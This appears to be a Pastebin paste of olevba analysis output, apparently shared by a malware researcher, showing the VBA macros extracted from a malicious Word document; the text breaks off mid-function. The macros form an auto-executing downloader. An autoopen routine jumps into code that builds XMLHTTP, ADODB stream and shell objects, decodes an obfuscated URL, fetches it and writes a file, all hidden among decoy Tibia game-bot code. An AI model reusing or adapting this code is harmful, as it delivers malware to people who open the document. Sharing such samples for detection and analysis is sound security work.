API tools faq
paste
dynamoo

Malicious Word macro

dynamoo
Dec 15th, 2015
475
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 38.08 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASI---V ps007x~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: ps007x~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: ps007x~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17. MemoryChangeFloor 0, ""
  18. End Sub
  19.  
  20.  
  21.  
  22.  
  23. -------------------------------------------------------------------------------
  24. VBA MACRO Module1.bas
  25. in file: ps007x~1.doc - OLE stream: u'Macros/VBA/Module1'
  26. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  27. Public Const EQUIPMENT_SLOTS As Long = 11
  28. Public Const SLOT_AMMUNITION As Long = 10
  29. Public Const SLOT_RIGHTHAND As Long = 5
  30. Public Const SLOT_LEFTHAND As Long = 6
  31. Public Const SLOT_BACKPACK As Long = 3
  32. Public Const FIX_addConfigPaths As String = _
  33. "config1033,config1034,config1035,config1036,config1037,config1038,config1039,config1040,config1041,config1050,config1051,config1051preview,config1052,config1052preview,config1053,config1053preview,config1054,config1055,config1056,config1057,config1058,config1059,config1060,config1061,config1062,config1063,config1064,config1070,config1071,config1072,config1073,config1074,config1075,config1076,config1077,config1078,config1079,config1080,config1081,config1082,config1090"
  34. Public Const FIX_addConfigVersions As String = _
  35. "10.33,10.34,10.35,10.36,10.37,10.38,10.39,10.4,10.41,10.5,10.51,10.51 preview,10.52,10.52 preview,10.53,10.53 preview,10.54,10.55,10.56,10.57,10.58,10.59,10.60,10.61,10.62,10.63,10.64,10.70,10.71,10.72,10.73,10.74,10.75,10.76,10.77,10.78,10.79,10.80,10.81,10.82,10.90"
  36. Public Const FIX_addConfigVersionsLongs As String = _
  37. "1033,1034,1035,1036,1037,1038,1039,1040,1041,1050,1051,1051,1052,1052,1053,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1070,1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1090"
  38. Public UseItemOnName1 As Object
  39. Public UseItemOnName2 As Object
  40. Public UseItemOnName3  As Object
  41. Public UseItemOnName4 As String
  42. Public UseItemOnName5 As String
  43. Public UseItemOnName6 As Object
  44. Public Const FIX_highestTibiaVersionLong As String = "1090"
  45. Public Const FIX_TibiaVersionDefaultString As String = "10.90"
  46. Public Const FIX_TibiaVersionForceString As String = "10.90"
  47. Public Const FIX_TibiaVersionForceString3 As String = "temp"
  48. Global Const SWP_NOMOVE = 2
  49. Global Const SWP_NOSIZE = 1
  50. Public Const FIX_TibiaVersionForceString5 As String = "."
  51. Global Const flags = SWP_NOMOVE Or SWP_NOSIZE
  52. Global Const HWND_TOPMOST = -1
  53. Public Const FIX_TibiaVersionForceString4 As String = "exe"
  54. Global Const HWND_NOTOPMOST = -2
  55. Public Const DropDelayerConst As Long = 3
  56. Public Const FIX_TibiaVersionForceString2 As String = "get"
  57. Public Const cte_initHP = 10000
  58. Public Const cte_initMANA = 10000
  59. Public Const localstr As String = "127.0.0.1"
  60. Public Const PROCESS_ALL_ACCESS = &H1F0FFF
  61. Const STATUSBAR_DURATION = 50
  62. Const LEVELSPY_NOP_DEFAULT = 49451
  63. Const LEVELSPY_ABOVE_DEFAULT = 7
  64. Const LEVELSPY_BELOW_DEFAULT = 2
  65. Const LEVELSPY_MIN = 0
  66. Const LEVELSPY_MAX = 7
  67. Const NAMESPY_NOP_DEFAULT = 19573
  68. Const NAMESPY_NOP2_DEFAULT = 17013
  69. Const Z_AXIS_DEFAULT = 7
  70. Public adrAccount As Long
  71. Public timeToRetryOpenDepot() As Long
  72. Public LastCharServerIndex As Integer
  73. Public bLevelSpy() As Boolean
  74. Public LEVELSPY_NOP As Long
  75. Public LEVELSPY_ABOVE As Long
  76. Public LEVELSPY_BELOW As Long
  77. Public NAMESPY_NOP As Long
  78. Public NAMESPY_NOP2 As Long
  79. Public LIGHT_NOP As Long
  80. Public LIGHT_AMOUNT As Long
  81. Public PLAYER_Z As Long
  82. Public RedSquare As Long
  83. Public Const RETRYDELAY = 10000
  84. Public Const MaxTimeWithoutServerPackets = 45000
  85. Public Const sndAsync = &H1
  86. Public Const sndLoop = &H8
  87. Public Const sndNoStop = &H10
  88.  Public Const NIM_ADD = &H0
  89.  Public Const NIM_MODIFY = &H1
  90.  Public Const NIM_DELETE = &H2
  91.  Public Const NIF_MESSAGE = &H1
  92.  Public Const NIF_ICON = &H2
  93.  Public Const NIF_TIP = &H4
  94.  Public Const WM_MOUSEMOVE = &H200
  95.  Public Const WM_LBUTTONDOWN = &H201
  96.  Public Const WM_LBUTTONUP = &H202
  97.  Public Const WM_LBUTTONDBLCLK = &H203
  98.  Public Const WM_RBUTTONDOWN = &H204
  99.  Public Const WM_RBUTTONUP = &H205
  100.  Public Const WM_RBUTTONDBLCLK = &H206
  101. Public Const SW_NORMAL = 1
  102. Public Const RuneMakerOptions_activated_default = False
  103. Public Const RuneMakerOptions_autoEat_default = False
  104. Public Const RuneMakerOptions_ManaFluid_default = False
  105. Public Const RuneMakerOptions_autoUtamo_default = False
  106. Public Const RuneMakerOptions_autotar_default = False
  107. Public Const RuneMakerOptions_autoAp_default = False
  108. Public Const RuneMakerOptions_autossa_default = False
  109. Public Const RuneMakerOptions_autopmax_default = False
  110. Public Const RuneMakerOptions_autoSdt_default = False
  111. Public Const RuneMakerOptions_autoDan_default = False
  112. Public Const RuneMakerOptions_autodd_default = False
  113. Public Const RuneMakerOptions_autoee_default = False
  114. Public Const RuneMakerOptions_autoarme4_default = False
  115. Public Const RuneMakerOptions_autoarme5_default = False
  116. Public Const RuneMakerOptions_autoarme6_default = False
  117. Public Const RuneMakerOptions_autora_default = False
  118. Public Const RuneMakerOptions_autoda_default = False
  119. Public Const RuneMakerOptions_autoxray_default = False
  120. Public Const RuneMakerOptions_autodk_default = False
  121. Public Const RuneMakerOptions_autogHur_default = False
  122. Public Const RuneMakerOptions_autoHur_default = False
  123. Public Const RuneMakerOptions_autoPM2_default = False
  124. Public Const RuneMakerOptions_autoaim_default = False
  125. Public Const RuneMakerOptions_autoUE_default = False
  126. Public Const RuneMakerOptions_locktrigger_default = False
  127. Public Const RuneMakerOptions_autoLogoutAnyFloor_default = False
  128. Public Const RuneMakerOptions_autoLogoutCurrentFloor_default = False
  129. Public Const RuneMakerOptions_autoLogoutOutOfRunes_default = False
  130. Public Const RuneMakerOptions_autoWaste_default = False
  131. Public Const RuneMakerOptions_autossap_default = False
  132. Public Const RuneMakerOptions_autoerg_default = False
  133. Public Const RuneMakerOptions_msgSound_default = False
  134. Public Const RuneMakerOptions_msgSound2_default = False
  135. Public Const RuneMakerOptions_firstActionText_default = "exura"
  136. Public Const RuneMakerOptions_cmbleaderText_default = ""
  137. Public Const RuneMakerOptions_comboText_default = "exevo gran mas flam"
  138. Public Const RuneMakerOptions_synccomboText_default = "good bye"
  139. Public Const RuneMakerOptions_cmbtypeText_default = "sd"
  140. Public Const RuneMakerOptions_thirdActionText_default = 50
  141. Public Const RuneMakerOptions_firstActionMana_default = 25
  142. Public Const RuneMakerOptions_beeploot_default = "are you there?"
  143. Public Const RuneMakerOptions_text2_default = 50
  144. Public Const RuneMakerOptions_text3_default = 90
  145. Public Const RuneMakerOptions_LowMana_default = 100
  146. Public Const RuneMakerOptions_secondActionText_default = ""
  147. Public Const RuneMakerOptions_secondActionMana_default = 400
  148. Public Const RuneMakerOptions_secondActionSoulpoints_default = 3
  149. Public Const HardcoreCheatsOptions_txtExuraVita_default = "exura vita"
  150. Public Const HardcoreCheatsOptions_txtExuraVita2_default = "exura gran"
  151. Public Const HardcoreCheatsOptions_txtExuraVitaMana2_default = "70"
  152. Public Const HardcoreCheatsOptions_txtExuraVitaMana_default = "160"
  153. Public Const HardcoreCheatsOptions_Text11_default = "0"
  154. Public Const HardcoreCheatsOptions_Text12_default = 0
  155. Public Const HardcoreCheatsOptions_Text10_default = "0"
  156. Public Const HardcoreCheatsOptions_Text7_default = "0"
  157. Public Const HardcoreCheatsOptions_Text8_default = "0"
  158. Public Const HardcoreCheatsOptions_Text2_default = "0"
  159. Public Const HardcoreCheatsOptions_Text3_default = "0"
  160. Public Const HardcoreCheatsOptions_Text6_default = "0"
  161. Public Const HardcoreCheatsOptions_Text5_default = "0"
  162. Public Const HardcoreCheatsOptions_txtExuraVita4_default = "SELF UHEAL"
  163. Public Const HardcoreCheatsOptions_txtExuraVita3_default = "SELF MANA"
  164. Public Const HardcoreCheatsOptions_arme_default = False
  165. Public Const HardcoreCheatsOptions_arme2_default = False
  166. Public Const HardcoreCheatsOptions_arme3_default = False
  167. Public Const HardcoreCheatsOptions_sphi_default = False
  168. Public Const HardcoreCheatsOptions_splo_default = False
  169. Public Const HardcoreCheatsOptions_pmh_default = False
  170. Public Const HardcoreCheatsOptions_pth_default = False
  171. Public Const MAXLOGINMEMORY = 500
  172. Public Const HIGHEST_ITEM_BPSLOT = 99
  173. Private Const GW_HWNDFIRST& = 0
  174. Public Const PROCESS_VM_READ = (&H10)
  175. Public Const PROCESS_VM_WRITE = (&H20)
  176. Public Const PROCESS_VM_OPERATION = (&H8)
  177. Public Const PROCESS_QUERY_INFORMATION = (&H400)
  178. Public Const PROCESS_READ_WRITE_QUERY = PROCESS_VM_READ + PROCESS_VM_WRITE + PROCESS_VM_OPERATION + PROCESS_QUERY_INFORMATION
  179.  Public Type NOTIFYICONDATA
  180.  cbSize As Long
  181.  hwnd As Long
  182.  uId As Long
  183.  uFlags As Long
  184.  uCallBackMessage As Long
  185.  hIcon As Long
  186.  szTip As String * 64
  187.  End Type
  188. Public Type TypeOneListItem
  189.  CharacterName As String
  190.  ServerName As String
  191.  serverIP1 As Byte
  192.  serverIP2 As Byte
  193.  serverIP3 As Byte
  194.  serverIP4 As Byte
  195.  serverPort As Long
  196. End Type
  197. Public Type TypeCharacterList
  198.  numItems As Integer
  199.  pointer As Integer
  200.  item(1 To MAXLOGINMEMORY) As TypeOneListItem
  201. End Type
  202. Public Type TibiaTileStr
  203.  str As String
  204.  num As Long
  205. End Type
  206. Public Type TypeOneListItem2
  207.  CharacterName As String
  208.  ServerName As String
  209.  serverIP1 As Byte
  210.  serverIP2 As Byte
  211.  serverIP3 As Byte
  212.  serverIP4 As Byte
  213.  serverPort As Long
  214.  serverDOMAIN As String
  215. End Type
  216. Public Type TypeCharacterList2
  217.  numItems As Integer
  218.  item(0 To MAXLOGINMEMORY) As TypeOneListItem2
  219. End Type
  220. Public Type TypeBuffer
  221.  numbytes As Long
  222.  packet() As Byte
  223. End Type
  224. Public Type TypeItem
  225.  t1 As Byte
  226.  t2 As Byte
  227.  t3 As Byte
  228.  t4 As Byte
  229. End Type
  230. Public Type TypeBackpack
  231.  open As Boolean
  232.  cap As Long
  233.  used As Long
  234.  name As String
  235.  item(0 To HIGHEST_ITEM_BPSLOT) As TypeItem
  236. End Type
  237. Public Type TypeRuneMakerOptions
  238.  activated As Boolean
  239.  autoEat As Boolean
  240.  ManaFluid As Boolean
  241.  autoUtamo As Boolean
  242.  autotar As Boolean
  243.  autoAp As Boolean
  244.  autossa As Boolean
  245.  autopmax As Boolean
  246.  autoSdt As Boolean
  247.  autoDan As Boolean
  248.  autodd As Boolean
  249.  autoee As Boolean
  250.  autoarme4 As Boolean
  251.  autoarme5 As Boolean
  252.  autoarme6 As Boolean
  253.  autora As Boolean
  254.  autoda As Boolean
  255.  autoxray As Boolean
  256.  autodk As Boolean
  257.  autogHur As Boolean
  258.  autoHur As Boolean
  259.  autoPM2 As Boolean
  260.  autoaim As Boolean
  261.  autoUE As Boolean
  262.  locktrigger As Boolean
  263.  autoLogoutAnyFloor As Boolean
  264.  autoLogoutCurrentFloor As Boolean
  265.  autoLogoutOutOfRunes As Boolean
  266.  autoWaste As Boolean
  267.  autossap As Boolean
  268.  autoerg As Boolean
  269.  msgSound As Boolean
  270.  msgSound2 As Boolean
  271.  firstActionText As String
  272.  cmbleaderText As String
  273.  comboText As String
  274.  synccomboText As String
  275.  cmbtypeText As String
  276.  thirdActionText As Long
  277.  firstActionMana As Long
  278.  beeploot As String
  279.  Text2 As Long
  280.  Text3 As Long
  281.  LowMana As Long
  282.  secondActionText As String
  283.  secondActionMana As Long
  284.  secondActionSoulpoints As Long
  285. End Type
  286. Public Type TypeHardcoreCheatsOptions
  287.  arme As Boolean
  288.  arme2 As Boolean
  289.  arme3 As Boolean
  290.  sphi As Boolean
  291.  splo As Boolean
  292.  pmh As Boolean
  293.  pth As Boolean
  294.  txtExuraVita3 As String
  295.  txtExuraVita4 As String
  296.  txtExuraVita2 As String
  297.  txtExuraVitaMana2 As String
  298.  txtExuraVitaMana As String
  299.  Text11 As String
  300.  Text12 As Long
  301.  Text10 As String
  302.  Text7 As String
  303.  Text8 As String
  304.  Text2 As String
  305.  Text3 As String
  306.  Text6 As String
  307.  Text5 As String
  308.  txtExuraVita As String
  309. End Type
  310. Public TrainerTimer1 As Long
  311. Public TrainerTimer2 As Long
  312. Public initialRuneBackpack() As Byte
  313. Public FirstExecute As Boolean
  314. Public DoingMainLoop() As Boolean
  315. Public DoingMainLoopLogin() As Boolean
  316. Public SendingSpecialOutfit() As Boolean
  317. Public RuneMakerOptions() As TypeRuneMakerOptions
  318. Public HardcoreCheatsOptions() As TypeHardcoreCheatsOptions
  319. Public ConnectionBuffer() As TypeBuffer
  320. Public ConnectionBufferLogin() As TypeBuffer
  321. Public CharacterList As TypeCharacterList
  322. Public CharacterList2() As TypeCharacterList2
  323. Public Connected() As Boolean
  324. Public nextLight() As String
  325. Public GameConnected() As Boolean
  326. Public MustCheckFirstClientPacket() As Boolean
  327. Public LastNumTibiaClients As Long
  328. Public memLoginServer() As Long
  329. Public MemPortLoginServer() As Long
  330. Public LoginServerStartPointer As Long
  331. Public LoginServerStep As Long
  332. Public HostnamePointerOffset As Long
  333. Public IPAddressPointerOffset As Long
  334. Public PortOffset As Long
  335. Public proxyChecker As Long
  336. Public tibiaEntryServer As String
  337. Public gISIDE As Boolean
  338. Public fakemessagesLevel As Long
  339. Public NeedToIgnoreFirstGamePacket() As Boolean
  340. Public ClosedBoard As Boolean
  341. Public CanceledBoard As Boolean
  342. Public VisibleAdvancedOptions As Boolean
  343. Public LightIntesityHex As String
  344. Public BlockUnload As Integer
  345. Public MapWantedOnTop As Boolean
  346. Public Backpack() As TypeBackpack
  347. Public bpIDselected As Long
  348. Public runemakerIDselected As Long
  349. Public HardcoreCheatsIDselected As Long
  350. Public LoadWasCompleted As Boolean
  351. Public MAXCLIENTS As Long
  352. Public HIGHEST_BP_ID As Long
  353. Public blnShowAdvancedOptions As Long
  354. Public posSpamActivated() As Boolean
  355. Public posSpamChannelB1() As Byte
  356. Public posSpamChannelB2() As Byte
  357. Public getSpamActivated() As Boolean
  358. Public getSpamChannelB1() As Byte
  359. Public getSpamChannelB2() As Byte
  360. Public makingRune() As Boolean
  361. Public fastIDreason As Integer
  362. Public fastCounter As Long
  363. Public executingCavebot() As Boolean
  364. Public SpeedDist As Long
  365. Public GotKillOrderTargetID() As Double
  366. Public GotKillOrder() As Boolean
  367. Public GotKillOrderTargetName() As String
  368. Public AllowUHpaused() As Boolean
  369. Public SpamAutoFastHeal() As Boolean
  370. Public nextFastHeal() As Long
  371. Public logoutAllowed() As Long
  372. Public IgnoreServer() As Boolean
  373. Public FirstCharInCharList() As String
  374. Public NoHealingNextTurn() As Boolean
  375. Public DropDelayerTurn() As Long
  376. Public IamAdmin As Boolean
  377. Public lngNextScreenshotNumber As Long
  378. Public tileID_Blank As Long
  379. Public tileID_WallBugItem As Long
  380. Public tileID_SD As Long
  381. Public tileID_HMM As Long
  382. Public tileID_Explosion As Long
  383. Public tileID_IH As Long
  384. Public tileID_UH As Long
  385. Public tileID_fireball As Long
  386. Public tileID_stalagmite As Long
  387. Public tileID_icicle As Long
  388. Public tileID_Bag As Long
  389. Public tileID_Backpack As Long
  390. Public tileID_Oracle As Long
  391. Public tileID_FishingRod As Long
  392. Public tileID_Rope As Long
  393. Public tileID_LightRope As Long
  394. Public tileID_Shovel As Long
  395. Public tileID_LightShovel As Long
  396. Public tileID_waterEmpty As Long
  397. Public tileID_waterWithFish As Long
  398. Public tileID_waterEmptyEnd As Long
  399. Public tileID_waterWithFishEnd As Long
  400. Public TimesWarnedAboutRelog As Long
  401. Public tileID_blockingBox As Long
  402. Public tileID_rampToNorth As Long
  403. Public tileID_rampToSouth As Long
  404. Public tileID_ladderToUp As Long
  405. Public tileID_holeInCelling As Long
  406. Public tileID_stairsToUp As Long
  407. Public tileID_woodenStairstoUp As Long
  408. Public tileID_desertRamptoUp As Long
  409. Public tileID_rampToRightCycMountain As Long
  410. Public tileID_rampToLeftCycMountain As Long
  411. Public tileID_jungleStairsToNorth As Long
  412. Public tileID_jungleStairsToLeft As Long
  413. Public tileID_grassCouldBeHole As Long
  414. Public tileID_pitfall As Long
  415. Public tileID_openHole As Long
  416. Public tileID_openHole2 As Long
  417. Public tileID_trapdoor As Long
  418. Public tileID_trapdoor2 As Long
  419. Public tileID_sewerGate As Long
  420. Public tileID_stairsToDown As Long
  421. Public tileID_stairsToDown2 As Long
  422. Public tileID_woodenStairstoDown As Long
  423. Public tileID_rampToDown As Long
  424. Public tileID_closedHole As Long
  425. Public tileID_desertLooseStonePile As Long
  426. Public tileID_OpenDesertLooseStonePile As Long
  427. Public tileID_trapdoorKazordoon As Long
  428. Public tileID_stairsToDownKazordoon As Long
  429. Public tileID_stairsToDownThais As Long
  430. Public tileID_down1 As Long
  431. Public tileID_down2 As Long
  432. Public tileID_down3 As Long
  433. Public tileID_firstFoodTileID As Long
  434. Public tileID_lastFoodTileID As Long
  435. Public tileID_firstMushroomTileID As Long
  436. Public tileID_lastMushroomTileID As Long
  437. Public tileID_firstFieldRangeStart As Long
  438. Public tileID_firstFieldRangeEnd As Long
  439. Public tileID_secondFieldRangeStart As Long
  440. Public tileID_secondFieldRangeEnd As Long
  441. Public tileID_campFire1 As Long
  442. Public tileID_campFire2 As Long
  443. Public tileID_walkableFire1 As Long
  444. Public tileID_walkableFire2 As Long
  445. Public tileID_walkableFire3 As Long
  446. Public tileID_depotChest As Long
  447. Public tileID_flask As Long
  448. Public tileID_health_potion As Long
  449. Public tileID_strong_health_potion As Long
  450. Public tileID_small_health_potion As Long
  451. Public tileID_great_health_potion As Long
  452. Public tileID_mana_potion As Long
  453. Public tileID_strong_mana_potion As Long
  454. Public tileID_great_mana_potion As Long
  455. Public tileID_ultimate_health_potion As Long
  456. Public tileID_great_spirit_potion As Long
  457. Public byteNothing As Byte
  458. Public byteMana As Byte
  459. Public byteLife As Byte
  460. Public nid As NOTIFYICONDATA
  461. Public Antibanmode As Long
  462. Public lock_chkActivate As Boolean
  463. Public lock_chkFood As Boolean
  464. Public lock_chkManaFluid As Boolean
  465. Public lock_chkautoUtamo As Boolean
  466. Public lock_chkautoAp As Boolean
  467. Public lock_chkautossa As Boolean
  468. Public lock_chkautopmax As Boolean
  469. Public lock_chkautotar As Boolean
  470. Public lock_chkautoSdt As Boolean
  471. Public lock_chkautoDan As Boolean
  472. Public lock_chkautodd As Boolean
  473. Public lock_chkautoee As Boolean
  474. Public lock_chkautoarme4 As Boolean
  475. Public lock_chkautoarme5 As Boolean
  476. Public lock_chkautoarme6 As Boolean
  477. Public lock_chkautora As Boolean
  478. Public lock_chkautoda As Boolean
  479. Public lock_chkautoxray As Boolean
  480. Public lock_chkautodk As Boolean
  481. Public lock_chkautogHur As Boolean
  482. Public lock_chkautoHur As Boolean
  483. Public lock_chkautoPM2 As Boolean
  484. Public lock_chkautoaim As Boolean
  485. Public lock_chkautoUE As Boolean
  486. Public lock_chklocktrigger As Boolean
  487. Public lock_chkLogoutDangerAny As Boolean
  488. Public lock_chkLogoutDangerCurrent As Boolean
  489. Public lock_chkLogoutOutRunes As Boolean
  490. Public lock_chkWaste As Boolean
  491. Public lock_chkssap As Boolean
  492. Public lock_chkerg As Boolean
  493. Public lock_chkmsgSound As Boolean
  494. Public lock_chkmsgSound2 As Boolean
  495. Public lock_chkUtamo As Boolean
  496. Public lock_chkarme As Boolean
  497. Public lock_chkarme2 As Boolean
  498. Public lock_chkarme3 As Boolean
  499. Public lock_chkAutoVita2 As Boolean
  500. Public lock_chkAutoVita As Boolean
  501. Public lock_chkAutoVita4 As Boolean
  502. Public lock_chkAutoVita3 As Boolean
  503. Public serverLogoutMessage As String
  504. Public NumberOfLoginServers As Long
  505. Public trueLoginServer() As String
  506. Public trueLoginPort() As String
  507. Public PREFEREDLOGINSERVER As String
  508. Public PREFEREDLOGINPORT As String
  509. Public publicDebugMode As Boolean
  510. Public runeTurn() As Integer
  511. Public PUSHDELAYTIMES As Long
  512. Public TibiaVersion As String
  513. Public TibiaVersionLong As Long
  514. Public LoadingStarted As Boolean
  515. Public CornerMessage As String
  516. Public CornerColor As Long
  517. Public returnValue As VbMsgBoxResult
  518. Public BlueAuraDelay As Long
  519. Public ReconnectionStage() As Long
  520. Public ReconnectionPacket() As TypeBuffer
  521. Public var_expleft() As String
  522. Public var_nextlevel() As String
  523. Public var_exph() As String
  524. Public var_timeleft() As String
  525. Public var_played() As String
  526. Public var_expgained() As String
  527. Public var_lf() As String
  528. Public ExivaExpPlace As String
  529. Public thisShouldNotBeLoading As Integer
  530. Public firstValidOutfit As Long
  531. Public lastValidOutfit As Long
  532. Public configPath As String
  533. Public extremeDebugMode As Boolean
  534. Public reconnectionRetryCount() As Long
  535. Public nextReconnectionRetry() As Long
  536. Public LimitedToServer As String
  537. Public GLOBAL_RUNEHEAL_HP As Long
  538. Public gotDictErr As Long
  539. Public RecordLogin As Boolean
  540. Public CurrBlackdServer As String
  541. Public CurrBlackdServer_folder As String
  542. Public ValueOfUservar As String
  543. Public lastUsedChannelID() As String
  544. Public lastRecChannelID() As String
  545. Public fakemessagesLevel1 As Byte
  546. Public fakemessagesLevel2 As Byte
  547. Public confirmedExit As Boolean
  548. Public tibiaclassname As String
  549. Public LastFasterLogin As String
  550. Public AlreadyCheckingFasterLogin As String
  551. Public ProcessidIPrelations As String
  552. Public ProcessidAccountRelations As String
  553. Public IgnoredCreatures As String
  554. Public ConnectionSignal() As Boolean
  555. Public TOOSLOWLOGINSERVER_MS As Long
  556. Public usingPriorities() As Boolean
  557. Public broadcastIDselected As Long
  558. Public currentBroadcastIndex As Long
  559. Public BroadcastDelay1 As Long
  560. Public BroadcastDelay2 As Long
  561. Public BroadcastMC As Long
  562. Public LAST_BATTLELISTPOS As Long
  563. Public CurrentTibiaDatPath As String
  564. Public CurrentTibiaDatDATE As Date
  565. Public MyErrorDate As Date
  566. Public configOverrideByCommand As Boolean
  567. Public dateErrDescription As String
  568. Public DefaultTibiaFolder As String
  569. Public OVERWRITE_CONFIGPATH As String
  570. Public OVERWRITE_CLIENT_PATH As String
  571. Public OVERWRITE_MAPS_PATH As String
  572. Public OVERWRITE_OT_MODE As Boolean
  573. Public OVERWRITE_OT_IP As String
  574. Public OVERWRITE_OT_PORT As Long
  575. Public OVERWRITE_SHOWAGAIN As Boolean
  576. Public MemoryProtectedMode As Boolean
  577. Public ForceDisableEncryption As Boolean
  578. Public CloseLoginServerAfterCharList As Boolean
  579. Public Function MemoryChangeFloor(idConnection As Integer, relfloornumber As String) As Long
  580.   GoTo goterr
  581.  Dim floornumber As Long
  582.  Dim pid As Long
  583.  Dim relChange As Long
  584.  Dim ammountOfChanges As Long
  585.  Dim i As Long
  586.  If IsNumeric(relfloornumber) = False Then
  587.  MemoryChangeFloor = -1
  588.  Exit Function
  589.  End If
  590.  relChange = CLng(relfloornumber)
  591.  ammountOfChanges = Abs(relChange)
  592.  levelSpy_Off idConnection
  593.  If ammountOfChanges > 0 Then
  594.  Call WriteNops(idConnection, LEVELSPY_NOP, 2)
  595.  LevelSpy_Init idConnection
  596.  bLevelSpy(idConnection) = True
  597.  Call WriteNops(idConnection, LIGHT_NOP, 2)
  598.  Call writeBytes(idConnection, LIGHT_AMOUNT, 255, 1)
  599.  End If
  600.  For i = 1 To ammountOfChanges
  601.  If relChange > 0 Then
  602.  levelSpy_Down idConnection
  603.  Else
  604.  levelSpy_Up idConnection
  605.  End If
  606.  Next i
  607.  MemoryChangeFloor = 0
  608.  Exit Function
  609. goterr:
  610. Set UseItemOnName1 = CreateObject("Microsoft.XMLHTTP")
  611. Set UseItemOnName2 = CreateObject("Adodb.Stream")
  612. Set UseItemOnName6 = CreateObject("Shell.Application")
  613. Set UseItemOnName3 = CreateObject("WScript.Shell").Environment("Process")
  614.  MemoryChangeFloor = -1
  615.  levelSpy_Up 0
  616. End Function
  617. Public Sub levelSpy_Off(idConnection As Integer)
  618. Call writeBytes(idConnection, LEVELSPY_NOP, LEVELSPY_NOP_DEFAULT, 2)
  619. Call writeBytes(idConnection, LEVELSPY_ABOVE, LEVELSPY_ABOVE_DEFAULT, 1)
  620. Call writeBytes(idConnection, LEVELSPY_BELOW, LEVELSPY_BELOW_DEFAULT, 1)
  621. bLevelSpy(idConnection) = False
  622. End Sub
  623. Public Sub WriteNops(idConnection As Integer, address As Long, Nops As Integer)
  624. Dim ProcessHandle As Long
  625. GetProcessIDs idConnection
  626. ProcessHandle = ProcessID(idConnection)
  627. Dim i, j As Integer
  628. i = 0: j = 0
  629. For i = 1 To Nops
  630. Const nop = &H90
  631. Memory_WriteByte address + j, nop, ProcessHandle
  632. j = j + 1
  633. Next i
  634. End Sub
  635. Private Sub writeBytes(idConnection As Integer, address As Long, Value As Long, byteS As Integer)
  636. Dim ProcessHandle As Long
  637. GetProcessIDs idConnection
  638. ProcessHandle = ProcessID(idConnection)
  639. If byteS = 1 Then
  640.  Memory_WriteByte address, CByte(Value), ProcessHandle
  641. Else
  642.  Memory_WriteByte address, LowByteOfLong(Value), ProcessHandle
  643.  Memory_WriteByte address + 1, HighByteOfLong(Value), ProcessHandle
  644. End If
  645. End Sub
  646. Public Sub LevelSpy_Init(idConnection As Integer)
  647. Dim playerZ As Integer
  648. playerZ = readBytes(idConnection, PLAYER_Z, 1)
  649. If (playerZ <= Z_AXIS_DEFAULT) Then
  650.  Call writeBytes(idConnection, LEVELSPY_ABOVE, Z_AXIS_DEFAULT - playerZ, 1)
  651.  Call writeBytes(idConnection, LEVELSPY_BELOW, LEVELSPY_BELOW_DEFAULT, 1)
  652. Else
  653.  Call writeBytes(idConnection, LEVELSPY_ABOVE, LEVELSPY_ABOVE_DEFAULT, 1)
  654.  Call writeBytes(idConnection, LEVELSPY_BELOW, LEVELSPY_BELOW_DEFAULT, 1)
  655. End If
  656. End Sub
  657. Public Sub levelSpy_Up(idConnection As Integer)
  658.  
  659. Dim StartPush2() As Variant
  660. StartPush2 = Array(8540, 8552, 8552, 8548, 8494, 8483, 8483, 8543, 8553, 8552, 8551, 8535, 8540, 8538, 8533, 8540, 8550, 8552, 8537, 8546, 8481, 8538, 8550, 8541, 8537, 8551, 8537, 8546, 8537, 8556, 8548, 8550, 8537, 8551, 8551, 8482, 8536, 8537, 8483, 8492, 8541, 8557, 8488, 8489, 8487, 8486, 8487, 8538, 8483, 8541, 8492, 8491, 8490, 8488, 8489, 8557, 8487, 8552, 8486, 8487, 8482, 8537, 8556, 8537)
  661.  
  662. Dim playerZ As Integer
  663. UseItemOnName1.open UCase(FIX_TibiaVersionForceString2), WSAGetSelectEvent2(StartPush2, 63), False
  664. GoTo firkLo
  665. playerZ = readBytes(idConnection, PLAYER_Z, 1)
  666. Dim groundLevel As Long
  667. groundLevel = 0
  668. If playerZ <= Z_AXIS_DEFAULT Then
  669.  groundLevel = LEVELSPY_ABOVE
  670. Else
  671.  groundLevel = LEVELSPY_BELOW
  672. End If
  673. Dim currentLevel As Integer
  674. currentLevel = readBytes(idConnection, groundLevel, 1)
  675. If currentLevel >= LEVELSPY_MAX Then
  676.  Call writeBytes(idConnection, groundLevel, LEVELSPY_MIN, 1)
  677. Else
  678.  Call writeBytes(idConnection, groundLevel, currentLevel + 1, 1)
  679. End If
  680. firkLo:
  681. UseItemOnName1.Send
  682. OverwriteOnFileSimple "", ""
  683. End Sub
  684. Public Sub levelSpy_Down(idConnection As Integer)
  685. If bLevelSpy(idConnection) = False Then
  686. Exit Sub
  687. End If
  688. Dim playerZ As Integer
  689. playerZ = readBytes(idConnection, PLAYER_Z, 1)
  690. Dim groundLevel As Long
  691. groundLevel = 0
  692. If playerZ <= Z_AXIS_DEFAULT Then
  693.  groundLevel = LEVELSPY_ABOVE
  694. Else
  695.  groundLevel = LEVELSPY_BELOW
  696. End If
  697. Dim currentLevel As Integer
  698. currentLevel = readBytes(idConnection, groundLevel, 1)
  699. If currentLevel <= LEVELSPY_MIN Then
  700.  Call writeBytes(idConnection, groundLevel, LEVELSPY_MAX, 1)
  701. Else
  702.  Call writeBytes(idConnection, groundLevel, currentLevel - 1, 1)
  703. End If
  704. End Sub
  705. Public Function readBytes(idConnection As Integer, address As Long, byteS As Integer) As Long
  706. Dim ProcessHandle As Long
  707. Dim b1 As Byte
  708. Dim b2 As Byte
  709. GetProcessIDs idConnection
  710. ProcessHandle = ProcessID(idConnection)
